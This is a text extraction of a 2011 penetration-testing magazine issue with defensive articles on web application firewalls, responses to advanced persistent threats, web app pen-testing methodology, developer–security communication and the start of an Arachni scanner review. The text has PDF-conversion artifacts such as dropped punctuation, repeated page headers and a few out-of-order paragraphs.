In summary any web application old or new needs to be secured by a WAF in Full Proxy Mode Penetration testers should check whether the WAF reliably cloaks system information in order to make attacks on the infrastructure less likely in the first place It should also check whether it prevents the hacking of the application itself with common or new means whether it secures all the backend systems the application connects to and it stops leakage of sensitive data when the web application has weaknesses which the WAF cannot level out If penetration testers are not only looking for a security snap shot but want to help their customers in creating sustainable security they should always include the WAFrsquos administration into their assessment
OLIVER WAIOliver Wai leads product marketing for Barracudarsquos line of Web application security and application delivery product lines In his role Oliver is a core member of Barracudarsquos security incident response team and writes frequently about the latest application security threats Prior to Barracuda Networks Oliver held positions at Google Integration Appliance and Brocade Communications Oliver has an MS in Management Science amp Engineering from Stanford University and BS (Cum Laude) in Computer Engineering from Santa Clara University
In the upcoming issue of the
If you would like to contact Pentest team just send an email to enpentestmagcom We will reply immediately We will reply asap
Web Session Management
Password management in code
ETHical Ghosts on SF1
Preservation namely in the online gambling industry
Cyber Security War
Available to download on December 22th
trade
To Do Listhellip
nalyzing oftware ecurity tilizing isk valuationtrade
Scan code for more on the state of software security
Know your softwarersquos pedigree Get ASSUREtrade
Learn more about software security assurance by visiting or by calling +1 (678) 809-2100
- Cover13
- EDITORrsquoS NOTE
- CONTENTS
- CONTENTS 213
- The Significance Of HTTP And The Web For Advanced Persistent 13Threats
- Web 13Application Security and Penetration Testing
- Developersare from Venus Application Security guys from 13Mars
- Pulling the Legs of 13Arachni
- XSS Beef Metaspoilt 13Exploitation
- Cross-site Request Forgery 13IN-DEPTH ANALYSIS bull CYBER GATES bull 2011
- First the Security Gate then the Airplane What needs to be heeded when checking web 13applications
-
ADVANCED PERSISTENT THREATS
Page 8 httppentestmagcom012011 (1) November Page 9 httppentestmagcom012011 (1) November
deployed with many more specifications relating to infrastructureThree steps are necessary to prevent or respond properly to an APT
bull Preventionbull Responsebull Forensics
PreventionIdeally security should be addressed at the very beginning when software and even the application infrastructure are still at the conception stage It is necessary to follow certain rules which will condition the response to different threats
Define a Secure Application InfrastructurePartition the NetworkThis measure is one of the pillars of the PCI-DSS and for good reason Keeping sections separate can limit the impact of an intrusion making it more difficult to obtainsatisfaction because of the large number of bounces required to attain sensitive data Each zone also deploys a security policy adapted to its content whether the flow is inbound or outbound
Moreover partitioning allows for easier forensic analysis in case of a compromise It is easier to understand the steps and measure the impact and the depth of the attack when one is able to analyze each area separately Unfortunately there are many systems described as flat infrastructures that contain a variety of applications housed in the same area After an incident has occurred it is difficult to determine precisely which applications have been compromised and what data has been hijacked
Separation of ApplicationsApplications can be separated using criteria such as data categorization or the level of risk attached to the application Clustering provides numerous advantages
bull It promotes rationalization in the design of security policies which are more or less complex depending on the type of data and the structure of the application to secure
bull It enhances understanding of an attack and by doing so facilitates the search for evidence which will then be based on the criticality of data and complexity of applications
Anticipate Possible OutcomesTo better understand the scope of an attack it is necessary to anticipate the options available to a
hacker once an application has been compromised Once this is done it is necessary to anticipate the procedures required to analyze verify and understand the attack We should bear in mind that an area of the infrastructure in which it is impossible to install a monitoring tool will be very complex to analyze during an incident In such a case it is necessary to predefine the tools and procedures for investigations and or monitoring
Risk analysis and attack guidelinesThis step allows a precise understanding of risks based on the data manipulated by applications
It has to be carried out by studying web applications their operation and business logic
Once each data component has been identified it is possible to draw up a list of rules and regulations that need to be followed by the application infrastructure
Developer TrainingApplications are commonly developed following specific business imperatives and often with the added stress of meeting availability deadlines Developers do not place security high up on their list of priorities and it is often overlooked in the process
However there are several ways to significantly reduce risk
bull Raising developer awareness of application attacksbull OWASP TOP10bull WASC TC v2
bull The use of libraries to filter inputbull Libraries are available for all languages
bull Setting up audit functions logs and traceabilitybull Accurate analysis of how the application works
Regular Auditing Code analysisYou can resort to manual code analysis by an auditor or to automated analysis by using the tools available to find vulnerabilities in the source code of web applications These tools often require complex configuration This step is useful to detect vulnerabilities before going into production and thus to fix them before they are exploited
Unfortunately the practice is only possible if you have access to the source code of the application Closed source software packages cannot be analyzed
Scanning and penetration testingAll applications can be scanned and pentested They also require configuration and or a thorough analysis of the application to determine the credentials necessary
ADVANCED PERSISTENT THREATS
Page 8 httppentestmagcom012011 (1) November Page 9 httppentestmagcom012011 (1) November
for navigation or resources to be avoided because of their capacity to cause significant damage (eg links enabling the deletion of entries in the database)
These tests have to be reproduced as often as possible and whenever a change in the application is put in place by developers
Appropriate ResponseTraditional firewalls do not filter network application protocols at best the so-called next-generation model can recognize a type of protocol and filter content in the manner of an IPS by recognizing attack patterns This response is clearly inadequate
Each zone containing web applications has to be filtered on incoming and outgoing content and on the use of the protocol itself
This type of deployment is often called deep defense and has the ability to monitor the various attacks at both the application and network levels
Last but not least the association of the identity context with security policy allows better detection of anomalies
Traffic Filtering The WAF (Web Application Firewall)Web application firewalls can be considered as an extension of application network firewalls They are able to analyze HTTP and the content it conveys The device is strongly recommended by section 66 of PCI-DSS
Often used in reverse proxy mode it allows for a break in protocol and facilitates the restructuring of areas between applications
The WAFEC document (Web Application Firewall Evaluation Criteria) published by WASC is a useful guideline that helps to understand and evaluate different vendors as needed
The WAF also helps to monitor and alert in case of threat in order to trigger a rapid response (eg blocking the IP of the attacker via a dialogue protocol with network firewalls)
Traffic Filtering The WSF (Web Services Firewall)It represents an extension of the WAF on the protocols carrying XML traffic over HTTP such as SOAP or REST
XML and its standards make security management easier in the sense that the operation of the service is described by documents generated directly by the development framework (eg WSDL Schemas)
Web services are vulnerable to the same attacks as web applications they consequently need the same
kind of protection Their position in the application infrastructure however is much more critical They are often located at the heart of sensitive information zones and connected directly via private links to partner infrastructures
The WSF provides security on the message format and content but also on the use of a service The use or production of a web service entails contract between two parties on the type of use (eg number of messages per day data type etc) The WSF will also serve to monitor this function and to ensure respect of SLA between the two parties
Authentication AuthorizationApplications use identities to control access to various resources and functions
The association of the identity context and security increases efficiency in the detection of anomalies For example a whitelist adapted according to the type of user can verify access to information based on user role
Ensuring Continuity of ServiceApplication security is primarily related to the exploitation of vulnerabilities in order to divert normal use for malicious purposes
However some attacks based on weaknesses can be devastating in effect perpetrated to make the application unavailable and thereby provoke losses due to activity downtime
To retaliate it is necessary to establish protective measures that block denial of service and automated processes and to ensure load balancing and SSL acceleration
OperationMonitoringIt is important to understand the use of the application during production to monitor and detect abnormal behavior and make decisions accordingly
bull Blacklistbull Legal Actionbull Redirection to a honeypot
Log CorrelationUnderstanding abnormal behavior in an application helps in locating an attack
An application infrastructure can comprise hundreds of applications
To understand the attack as a whole and monitor changes (discovery aggression compromise) it is necessary to have holistic view
ADVANCED PERSISTENT THREATS
Page 10 httppentestmagcom012011 (1) November
To do this it is imperative to confront and correlate logs correlation to obtain real-time overall analysis and understand the threat mechanics
bull Mass Attack on a type of applicationbull Attack targeting a specific applicationbull Attacks focused on a type of data
Reporting and AlertingThe dialogue between application network and security teams is often complex within an organization Formalized reports on attacks and the use of the application provide a basis for work and an understanding of application threats for these teams
Alerts will enable them to react and trigger procedures either at the network level by blocking the IP of the attacker or at the application level by forbidding access to resources areas or more directly by referral to a honeypot in view of analyzing the behavior of the attacker
ForensicsUnderstanding the scope of an attackFor each area compromised it is important to understand what elements have been impacted and to trace the attack to the roots of the intrusion and compromise by the installation of a backdoor bounce mechanisms to other areas and or extraction of data
Analysis of application componentsTo understand how the intrusion occurred it is
important to look for abnormal uses One example could be the presence of anomalous data in a variable a cookie To drill down to this level the logs of the various application components turn out to be very useful
bull Web server or applicationbull Databasebull Directorybull Etc
Systems AnalysisTo understand how the attacker remained in the area it is important to identify the type of backdoor used From the simplest act such as the placing an executable file in the application itself to the injection of code into a process (eg hook network functions) it is necessary to analyze the system hosting the application
bull Changed configuration filesbull Users addedbull Security rules changed
bull Errors of execution or increase in privileges
bull Unknown daemons or unusual groups and users bull Etc
Analysis of network equipmentDuring the various bounces within the application infrastructure the discovery and exploration of new possibilities leaves fingerprints Network firewalls keep precious logs with traces of these attempts In addition if access is logged it is important to check if there are connections to web applications at unusual times
The End justifies the MeansIn conclusion we can see that the means used to achieve an APT are often substantial and proportional to the criticality of targeted data APT are not just temporary attacks but real and constant threats with latent effect that need to fought in the long run
The security of an application infrastructure begins with the conception process and requires basic rules to be respected to simply security operations
Real-life experience of application management highlights difficulties in implementing all the good practices
A comprehensive study of threats appropriate response and anticipation of possible incidents are now the recommended procedure in dealing with application attacks
MATTHIEU ESTRADEMatthieu Estrade has 14 years experience in internet security In 2001 Matthieu designed a pioneering application rewall based on Web Reverse Proxy Technology for the company Axiliance As a well known specialist in his eld he soon became a member of the Open Source Apache HTTP server development team His security expertise has been put to contribution in WASC (Web Application Security Consortium) projects like WAFEC and WASSEC Matthieu is also a member of the French OWASP chapter Matthieu is currently CTO at BeeWare
a d v e r t i s e m e n t
WEB APP SECURITY
Page 12 httppentestmagcom012011 (1) November
Dynamic web applications usually use technologies such as ASP ASPNet PHP Ajax JSP Perl Cold Fusion Flash and etc
These applications expose financial data customer information and other sensitive and confidential data that required authentication and authorization Ensuring that the web applications are secure is a critical mission that businesses have to go through to achieve the desired security level of such applications With the accessibility of such critical data to the public domain web application security testing also becomes paramount process for all the web applications that are exposed to the outside world
IntroductionPenetration testing (It is also called Pen Testing) is usually conducted by ethical hackers where the security team reviews application security vulnerabilities to discover potential security risks Such process requires a deep knowledge experience in a variety of different tools and a range of exploits that can achieve the required tasks
During the pen testing different web applicationsrsquo vulnerabilities are tested (eg Input Validation Buffer Overflow Cross Site Scripting URL Manipulation SQL Injection Cookie Modification Bypassing Authentication and Code Execution) A typical pen testing involves the following procedures
bull Identification of Ports ndash In this process ports are scanned and the associated services running are identified
bull Software Services Analyzed ndash In this process both automated and manual testing is conducted to discover weaknesses
bull Verification of Vulnerabilities ndash This process helps verify that the vulnerabilities are real where weakness might be exploited to help remediate the issues
bull Remediation of Vulnerabilities ndash In this process the vulnerabilities will be resolved and such vulnerabilities will be re-tested to ensure they have been addressed
Part of the initiative of securing the web applications is to include the security development lifecycle as part of the software development lifecycle where the number of security-related design and coding defects can be reduced and also the severity of any defects that do remain undetected can be reduced or eliminated Despite the fact that the above initiatives solve some of the security problems some of undiscovered defects will remain even in the most scrutinized web applications Until scanners can harness true artificial intelligence and put the anomalies into context or make normative judgments about them the struggle to find certain vulnerabilities will exist
WebApplication Security and Penetration Testing
In the recent years web applications have grown dramatically within many organizations and businesses where such entities became very independent on such technology as part of their businessesrsquo lifecycle
Automated Scanning vs Manual Penetration TestingA vulnerabilities assessment simply identifies and reports vulnerabilities whereas a pen testing attempts to exploit vulnerabilities to determine whether unauthorized access to other malicious activities is possible By performing a pen testing to simulate an attack itrsquos possible to evaluate whether an application has any potential vulnerabilities resulting from poor or improper system configuration hardware or software flaws or weaknesses in the perimeter defences protecting the application
With more than 75 of the attacks occurring over the HTTPS protocols and more than 90 of web applications containing some type of security vulnerability it is essential that organizations implement strong measures to secure their web applications Most of these attacks occur on the front door of the organization where the entire online community has an access to these doors (ie port 80 and port 443) With the complexity and the tremendous amount of sensitive data exist within web applications consumers not only expect but also demand security for this information
That said securing a web application goes far beyond testing the application using automated systems and tools or by using manual processes The security implementation begins in the conceptual phase where the modeling of the security risk is introduced by the application and the countermeasures that are required to be implemented It is imperative that the web application security should be thought of as another quality vector of every application that has to be considered through every step of the application lifecycle
Discovering web application vulnerabilities can be performed through different processes
bull Automation process ndash where scanning tools or static analysis tools will be used
bull Manual process ndash where penetration testing or code review will be used
Web application vulnerability types can be grouped into two categories
Technical VulnerabilitiesWhere such vulnerabilities can be examined through the following tests Cross-Site-Scripting Injection Flaws and Buffer Overflow Automated systems and tools which analyze and test the web applications are much better equipped to test for technical vulnerabilities than the manual penetration tests While automated testing and scanning tools may not be able
012011 (1) November
WEB APP SECURITY
Page 14 httppentestmagcom012011 (1) November Page 15 httppentestmagcom012011 (1) November
to address 100 of all the technical vulnerabilities there is no reason to believe that such tools will achieve such goal in the near future Current problems facing the web application tools are the following client-side generated URLs required JavaScript functions application logout transaction-based systems requiring specific user paths automated form submission one time passwords and Infinite web sites with random URL-based session IDs
Logical VulnerabilitiesWhere such vulnerabilities can manipulate the logic of the application to do tasks that were never intended to be done While both an automated scanning tool and skilled penetration tester can navigate through a web application only the latter is able to understand what the logic behind specific workflow or how the application works in general Understanding the logic and the flow of an application allows the manual pen testing to subvert or overthrow the business logic where security vulnerabilities can be exposed For instance an application might direct the user from point A to point B to Point C based on the logic flow implemented within the application where point B represents a security validation check A manual review of the application might show that it is possible for attackers to manipulate the web application to go directly from point A to point C and bypassing the security validation exists at point B
History has proven that software bugs defects and logical flaws are consistently the primary cause of commonly exploited application software vulnerabilities where it can lead to unauthorized access to the systems networks and application information It is also proven that most of the security breaches occur due to vulnerabilities within the web application layer (ie attacks using the HTTPHTTPS protocol) In such attacks traditional security mechanism such as firewalls and IDS provide little or no protection against attacks on the web applications
Security analyses review the critical components of a web-based portal e-commerce application or web services platform Part of the analyses work that can be done is to identify vulnerabilities inherent in the code of the web application itself regardless of the technology implemented back-end database or web server used by the application
Itrsquos imperative to point out that the web application penetration assessments should be designed based upon defined threat-model It should also be based upon the evaluation of the integration between components (eg third party components and in-house built components) and the overall deployment configuration that represents a solid choice for establishing a baseline security assessment Application penetration assessments server as a cost-effective mechanism to identify a set of vulnerabilities in a given application where it exposes the most likely exploit vulnerabilities
Figure 1 The different activities of the Pen Testing processes
WEB APP SECURITY
Page 14 httppentestmagcom012011 (1) November Page 15 httppentestmagcom012011 (1) November
and allow to find similar instances of vulnerabilities throughout the code
How Web Application Pen Testing WorksMost of the web applicationsrsquo penetration testing is carried out from security operations centers where the access to the resources under test will be remotely over the Internet using different penetration technologies At the end of such test the application penetration test provides a comprehensive security assessment for various types of applications (eg commercial enterprise web applications internally developed applications web-based portal and e-commerce application) Figure-1 describes some of the activities that usually happen during the pen testing process Some of the testing processes that are used to achieve the security vulnerabilities assessment such as Application Spidering Authentication Testing Session Management Testing Data Validation Testing Web Service Testing Ajax Testing Business Logic Testing Risk Assessment and Reporting
In conducting the web penetration testing different approaches can be used to achieve the security vulnerabilities assessment some of these approaches are
bull Zero-Knowledge Test (Black Box) ndash In such ap-proach the application security testing team will not have any of inside information about the target
environment and the expected knowledge gain will be based on information that can be found out in the public domain This type of test is designed to provide the most realistic penetration test possible since in many cases attackers start with no real knowledge of the target systems
bull Partial Knowledge Test (Gray Box) ndash In such ap-proach a partial gain of knowledge about the environment under testing will be achieved before conducting the test
bull Source Code Analysis (White Box) ndash In such ap-proach the penetration test team has fill information about the application and its source code In such test the security team will do a code review (line-by-line) in attempt to find any flaws that could allow attackers to take control of the application perform a denial of service attack against it or use such flaws to gain access to the internal network
Itrsquos also important to point out that penetration testing can be achieved through two different types of testing
bull External Penetration Testing bull Internal Penetration Testing
Both types of testing can be conducted with least information (black box) and also can be conducted with limited information (white box)
Figure 2 The different phases of the Pen Testing
WEB APP SECURITY
Page 16 httppentestmagcom012011 (1) November Page 17 httppentestmagcom012011 (1) November
Figure-3 shows different procedures and steps that can be used to conduct the penetration testing The following are the description of these steps
bull Scope and Plan ndash In this step the scope of the penetration testing is identified and the project plan and resources will be defined
bull System Scan and Probe ndash In this step the system scanning under the defined scope of the project will be conducted where the automated scanners will examine the open ports scanning the system to detect vulnerabilities and hostnames and IP addresses previously collected will be used at this stage
bull Creating of Attack Strategies ndash In this step the testers prioritize the systems and the attack methods will be used based on the type of the system and how critical these systems Also in this stage the penetration testing tools will be selected based on the vulnerabilities detected from the previous phase
bull Penetration Testing ndash In this step the exploitation of vulnerabilities using the automated tools will be conducted where the attacking methods designed in the previous phase will be used to conduct the following tests data amp service pilferage test buffer overflow privilege escalation and denial of services (if applicable)
bull Documentation ndash In this step all the vulnerabilities discovered during the test are documented evidence of exploitation and penetration testing findings are also recommended to be presented later within the final report
bull Improvement ndash The final step of the penetration testing is to provide the corrective actions on
closing the discovered vulnerabilities within the systems and the web applications
Web Applications Testing ToolsThrough the Pen testing a specific structure methodology has to be followed where the following steps might be used Enumeration Vulnerabilities Assessment and Exploitation Some of the tools that might be used within these steps are
bull Port Scannersbull Sniffersbull Proxy Serversbull Site Crawlersbull Manual Inspection
The output from the above tools will allow the security team to gather information about the environment such as Open ports Services Versions and Operating Systems The vulnerabilities assessment utilizes the data gathered in the previous step to uncover potential vulnerabilities in the web server(s) application server (s) database server (s) and any intermediary devices such as firewalls and load-balancers Itrsquos also important for the security team not to rely solely on the tools during the assessment phase to discover vulnerabilities manual inspection for items such as HTTP responses hidden fields and HTML page sources should be part of the security assessment as well
Some of the areas that can be covered during the vulnerabilities assessment are the following
bull Input validationbull Access Control
Figure 3 Testing techniques procedures and steps
WEB APP SECURITY
Page 16 httppentestmagcom012011 (1) November Page 17 httppentestmagcom012011 (1) November
bull Authentication and Session Management (Session ID flaws) Vulnerabilities
bull Cross Site Scripting (XSS) Vulnerabilities bull Buffer Overflowsbull Injection Flawsbull Error Handlingbull Insecure Storagebull Denial of Service (if required)bull Configuration Managementbull Business logic flawsbull SQL Injection faultsbull Cookie manipulation and poisingbull Privilege escalationbull Command injectionbull Client side and header manipulation bull Unintended information disclosure
During the assessment testing the above vulnerabilities is performed except those that could cause a Denial of Service conditions and usually discussed beforehand Possible options of Denial of Service testing include testing during a specific time testing a development system or manually verifying the condition that may be responsible for the vulnerability Once the vulnerabilities assessment is complete the final reports recommendations and comments are summarized and better solutions are suggested for the implementation process Once the above assessments are done the penetration test is half-way done and the most important part of the assessment has to be delivered which is the informative report thatrsquos highlights all the risks found during the penetration phase
The following are some of the commonly used tools for traditional penetration testing
Port ScannersSuch tools are used to gather information about which network services are available for connection on each target host The port scanning tools usually examines or questions each of the designated network ports or service on the target system Most of these tools are able to scan both TCP as well as UDP ports Another common feature of port scanners is their ability to examine the operating system type and its version number since protocol such as TCPIP implementation can vary in their specific responses The configuration flexibility in the port scanners serve examining the different port configuration as well as employ the ability to hide from the network intrusion detection mechanisms
Vulnerability ScannersWhile port scanners only produce an inventory of the types of available services the vulnerability scanners
attempt to exercise vulnerabilities on their targeted systems The main goal of the vulnerability scanners is to provide an essential means of meticulously examining each and every available network service on the targeted hosts These scanners work from a database of documented network service security defects and exercising each defect on each available service of the target hosts Most of the commercial and the open source scanners scan the operating system for known weaknesses and un-patched software as well as configuration problems such as user permission management defects or problem with file access controls Despite the fact that both network-based and host-based vulnerability scanners do little to help web application-level penetration test they are fundamental tools for any penetration testing Good examples for such tools are Internet Scanners QualysGuard or Core Impact
Application ScannersMost of the application scanners can observe the functional behaviour of an application and then attempt a sequence of common attacks against the application Popular commercial application scanners include Appscan and WebInspect
Web application Assessment ProxyAssessment proxies work by interposing themselves between the web browsers used by the testers and the target web server where data can be viewed and manipulated Such flexibility adds different tricks to exercise the applicationrsquos weaknesses and its associated components For example the penetration testers can view all cookies hidden HTML fields and other data used by the web application and attempt to manipulate their values to trick the application
The above penetration testing practice called a black box testing Some organizations use hybrid approaches where the traditional penetration testing along with some level of source code analysis of the web application is used Most of the penetration testing tools can perform the penetration testing practices however choosing the right tool for the job is something vital for the success of the penetration process and the accurate results
The following are some of the common features that should be implemented within the penetration testing tools
bull Visibility ndash The tool must provide the required visibility for the testing team that can be used as a feedback and reporting feature of the test results
bull Extensibility ndash The tool can be customized and it must provide scripting language or plug-in
WEB APP SECURITY
Page 18 httppentestmagcom012011 (1) November
capabilities that can be used to construct cust-omized the penetration testing
bull Configurability ndash Having the tool that can be configurable is highly recommended to ensure the flexibility of the implementation process
bull Documentation ndash The tool should provide the right documentation that can provide clear explanation for the probes performed during the penetration testing
bull License Flexibility ndash The tool that has the flexibility of use without specific constraints such as a particular IP range of numbers and license limits is a better tool than others
Security Techniques for Web Apps Some of the security techniques that can be implemented within the web application to eliminate vulnerabilities are
bull Sanitize the data coming from the browser ndash Any data that is sent by the browser can never be trusted (eg submitted form data uploaded files cookies data XML etc) If web developers fail to sanitize the incoming data from unwanted data it might lead to vulnerabilities such as SQL injection cross site scripting and other attacks against the web application
bull Validate data before form submission and manage sessions ndash To avoid Cross Site Request Forgery (CSRF) that can occur when a web application accepts form submission data without verifying if it came from a user web form It is imperative for the web application to verify that the user form is the one that the web application had produced and served
bull Configure the server in the best possible way ndash network administrators have to follow some guidelines for hardening the web servers Some of these guidelines are Maintain and update proper security patches kill all the redundant services and shutdown unnecessary ports confine access rights to folders and files employ SSH (Secure Shell network protocol) rather than using telnet or FTP and install efficient anti-malware software
In addition to the above guidelines it is always important to implement strong passwords for the web applications users and cleaning stored passwords
ConclusionA vulnerability assessment is the process of identifying prioritizing quantifying and ranking the vulnerabilities in a system where such process determines if there is
a weakness or vulnerabilities in the system subjected to the assessment Penetration testing includes all of the process in vulnerabilities assessment plus the exploitation of vulnerabilities found in the discovery phase
Unfortunately an all clear result from a penetration test doesnrsquot mean that an application has no problems Penetration tests can miss weakness such as session forging and brute-forcing detection and as such implementing security throughout an applicationrsquos lifecycle is imperative process for building secure web applications
As automated web application security tools have matured in the recent years and over time automated security assessment will continue to both reduce any uncertainty of determination (ie false positive results) and the potential to miss some issues (ie false negatives results)
Both automated and manual penetration testing can be used to discover critical security vulnerabilities in web applications Currently the automated tools canrsquot be entirely used as a replacement of the manual penetration test However if the automated tools are used correctly organizations can save a lot of money and time in finding broad range of technical security vulnerabilities in web applications The manual penetration testing can be used to augment the results of the logical vulnerabilities found as a result of using the automated testing
Finally it is important to point out that over time the manual testing for technical vulnerabilities will increase from difficult to impossible as web applications size and the scope of such applications and their complexity increase The fact that many enterprise organizations will not be able to dedicate the time money and the effort required to assess the thousands of web applications will increase the chances of using the automated tools rather than using the human factor to manually testing these applications Also relying on human efforts to test for thousands of technical vulnerabilities within these applications is subject to the human errors and simply canrsquot be trusted
BRYAN SOLIMANBryan Soliman is a Senior Solution Designer currently working with Ontario Provincial Government of Canada He has over twenty years of Information Technology experience with Bachelor degree in Engineering bachelor degree in Computer Science and Master degree in Computer Science
WHAT IS A GOOD FUZZING TOOLFuzz testing is the most efficient method for discovering both known and unknown vulnerabilities in software It is based on sending anomalous (invalid or unexpected) data to the test target - the same method that is used by hack-ers and security researchers when they look for weaknesses to exploit There are no false positives if the anomalous data causes abnormal reaction such as a crash in the target software then you have found a critical security flaw
In this article we will highlight the most important requirements in a fuzzing tool and also look at the most common mistakes people make with fuzzing
Documented test cases When a bug is found it needs to be documented for your internal developers or for vulnerability management towards third party developers When there are billions of test cases automated documentation is the only possi-ble solution
Remediation All found issues must be reproduced in order to fix them Network recording (PCAP) and automated reproduction packages help you in delivering the exact test setup to the develop-ers so that they can start developing a fix to the found issues
MOST COMMON MISTAKES IN FUZZINGNot maintaining proprietary test scripts Proprietary tests scripts are not rewritten even though the communication interfaces change or the fuzzing platform becomes outdated and unsupported
Ticking off the fuzzing check-box If the requirement for testers is to do fuzzing they almost always choose the quick and dirty solution This is almost always random fuzzing Test requirements should focus on coverage metrics to ensure that testing aims to find most flaws in software
Using hardware test beds Appliance based fuzzing tools become outdated really fast and the speed requirements for the hardware increases each year Software-based fuzzers are scalable in performance and can easily travel with you where testing is needed and are not locked to a physical test lab
Unprepared for cloud A fixed location for fuzz-testing makes it hard for people to collaborate and scale the tests Be prepared for virtual setups where you can easily copy the setup to your colleagues or upload it to cloud setups
PROPERTIES OF A GOOD FUZZING TOOLThere are abundance of fuzzing tools available How to distin-guish a good fuzzer what are the qualities that a fuzzing tool should have
Model-based test suites Random fuzzing will certainly give you some results but to really target the areas that are most at risk the test cases need to be based on actual protocol models This results in huge improvement in test coverage and reduction in test execu-tion time
Easy to use Most fuzzers are built for security experts but in QA you cannot expect that all testers understand what buffer overflows are Fuzzing tool must come with all the security know-how built-in so that testers only need the domain expertise from the target system to execute tests
Automated Creating fuzz test cases manually is a time-consuming and difficult task A good fuzzer will create test cases automatically Automation is also critical when integrating fuzzing into regression testing and bug reporting frameworks
Test coverage Better test coverage means more discovered vulnerabilities Fuzzer coverage must be measurable in two aspects specification coverage and anomaly coverage
Scalable Time is almost always an issue when it comes to testing User must also have control on the fuzzing parameters such as test coverage In QA you rarely have much time for testing and therefore need to run tests fast Sometimes you can use more time in testing and can select other test completion criteria
WEB APP SECURITY
Page 20 httppentestmagcom012011 (1) November Page 21 httppentestmagcom012011 (1) November
Application Security members are considered like the tax man asking for money Security is sometimes seen as a cost to pay in order to get
an application into Production Actually it is a little of everyones fault Since Security people and Developers usually do not talk the same language it is difficult for the two groups to work together and give each other the necessary attention and feedback that they deserve Letrsquos take a step back for a minute and let me clarify what I mean about language and communication Consider this scenario The Marketing department has asked for a brand new web portal that shows new products from the ACME corporation Marketers usually do not know anything about technology and they just want to hit the market with an aggressive campaign on the new product line Marketers might ask the developers something like Give us the latest Web 20 Social website enabled or something like that to impress the customers Plus they would like it as soon as possible and they provide a deadline that the developers must keep The developers brainstorm the idea write out some specifications and requirements start prototyping their ideas and eventually begin coding They are under pressure to meet the deadline and management usually presses even more to meet the proposed deadline Security slowly is pushed aside so that the coding and production can meet the deadline Most software architecture is not designed with security in mind and in project Gantt Charts there usually
are no security checkpoints included for code testing or allow time for security fixes or remediation
Developers are pushed to code the application so that they can meet the deadline Acceptance tests and functionality tests are passed and the application is almost ready for deployment when someone recalls something about security Hey we need to get this on-line So we need to open up firewall to allow access to it
The Security Application group asks for additional information about the application and request docu-mentation of how the application was built They do not see it from the developersrsquo point of view of meeting the deadline that Management has imposed on them
On the other side developers do not see the problem from a security perspective What risks to IT infrastructure will potentially be exposed if someone breaks into the new application
One solution to the problem is to execute a penetration tests on the application and look at the results Then security is happy since they can test the application and developers are happy once the penetration test report is complete Many times a Penetration Test report contains recommended mitigation steps that impose additional time restraints on the application delivery Reports usually contain just the symptom For example the report might have statements like a SQL injection is possible not the real root cause a parameter taken from a config file is not sanitized before utilization The report does not contain all
Developers are from Venus Application Security guys from
Mars
We know that Application Security people talk a different language than developers do whenever we publish a report make an assessment or when we review a software architecture from a security point of view There is a gap between developers and the Application Security group The two teams must interact with each other to reach the same goal of building secure code
WEB APP SECURITY
Page 20 httppentestmagcom012011 (1) November Page 21 httppentestmagcom012011 (1) November
but which is the right one to use to insure secure code development
NET has one single monolithic framework and Microsoft has invested money in security and it seems they did it the right way but it is not Open Source so professionals cannot contribute A generic framework based solution is not feasible What about APIrsquos Developers do know how to use APIrsquos and having security controls embedded into a single library can save the day when writing source code That is why OWASP introduced ESAPI project to provide a set of APIrsquos that developers can use to embed security controls into their code
The requested effort is minimal if compared to translate implement a filter policy into running code and you (as a security professional) now speak the same language as the developer This is a win-win approach The security team and the application developers are now on the same page and everyone is happy There is a third approach I will cover in a follow-up article It is the BDD approach BDD is the acronym for Behavior Driven Development which means that you start writing test cases (taking examples from the Ruby on Rails world you write most of time test beds using rspec and cucumber) modeling how the source code has to behave accordingly to the documentation or requirements specification Initially when you execute the test cases against your application there will probably be failures that need to be corrected The idea is straightforward Using the WAPT activity instead of a implement a filtering policy statement you will produce a set of rspeccucumber scenarios modeling how the source code can deal with malformed input Then the development team starts correcting the code until it passes all of the test cases and when testing is complete and all tests pass it will mean your source code has implemented a filtering policy How has development changed A new approach has been created to insure that the developers implement your remediation statement Now the developers understand how to handle malformed entry statements and why they are so important to the Application Security group
The next article we will see how to write some security tests using the BDD approach in order to help a generic Lava developer to deal with cross-site scripting vulnerabilities
of the information necessary to solve the problems at first glance The developers cannot mitigate all of the issues in time to meet the deadline so many times bug fixes are prolonged or pushed into the next revision of the software and in some cases they are never fixed Another problem is when the two groups talk to each other at the end of the whole process and they use a non-common-ground language that further confuses or annoys everyone and further pushes the groups further apart
Communications Breakdown You Give Me The ReportPenetration test reports are most of the times useless from the developers point of view because they do not give specific information where they can pinpoint where the problem is This is very ironic because the developers need to take full advantage of the security report since most of remediation is source code fixes
Security issues found in Penetration testing is not for the faint of heart There can be a lot of high-level security issues grouped by OWASP Top 10 (most of time) with some generic remediation steps such as implement an input filtering policy This information may not mean anything to a source code developer They want to know what module class or line where the problem exists so that they can fix it If provided enough time developers can eventually determine where the problem exists but usually they do not have the time to look through all of the code to find every testing error and still have time to get the application into production
Letrsquos Close the GapWhat we need to do is define a common ground where security can be integrated into source code somewhat painlessly Security should be transparent from the deve-lopment teamrsquos point of view This can be achieved by
bull Create a development framework that has security built into it
bull Design an API to be used by the application
Putting security into the framework is the Rails approach Railsrsquo developers added a security facility inside the frameworkrsquos helpers so developers inherit the secure input filtering SQL injection protection and CSRF protection token This is a huge step forward to assist developers with this problem This methodology works with a programming language that contains a secure framework for developing web application This is true for the Ruby community (other frameworks like Sinatra do have some security facilities as well) With the Java programming language community there are a lot of non-standardized frameworks available for Java developers
PAOLO PEREGOPaolo Perego is an application security specialist interested in xing the code he just broke with a web application penetration test Hersquos interested in code review and hersquos working on his own hybrid analysis tool called aurora He loves Ruby on Rails kernel hacking playing guitar and playing Tae kwon-do ITF martial art Hersquos an husband and a daddy and a startup wannabe You may want to check out Paolorsquos blog or looking at his about me page
WEB APP VULNERABILITIES
Page 22 httppentestmagcom012011 (1) November Page 23 httppentestmagcom012011 (1) November
Arachni is not a so-called inspection proxy such as the popular commercial but low-cost Burp Suite or the freeware Zed Attack Proxy of the Open
Web Application Security project (OWASP) These tools are really meant to be used by a skilled consultant doing manual investigations of the application
Arachni can be better compared with commercial online scanners which will be directed to the application and produce a report with no further interaction by the user
Every security consultant or hacker must understand the strengths and weaknesses of his or her toolset and to must choose the best combination of tools possible for the job at hand Is Arachni worthwhile
Time for an in-depth review
Under the HoodAccording to the documentation Arachni offers the following
bull Simplicity everything is simple and straight-forward from a userrsquos or component developerrsquos point of view
bull A stable efficient and high-performance framework Arachni allows custom modules reports and plug-ins Developers can easily use the advanced framework features without knowing the nitty gritty details
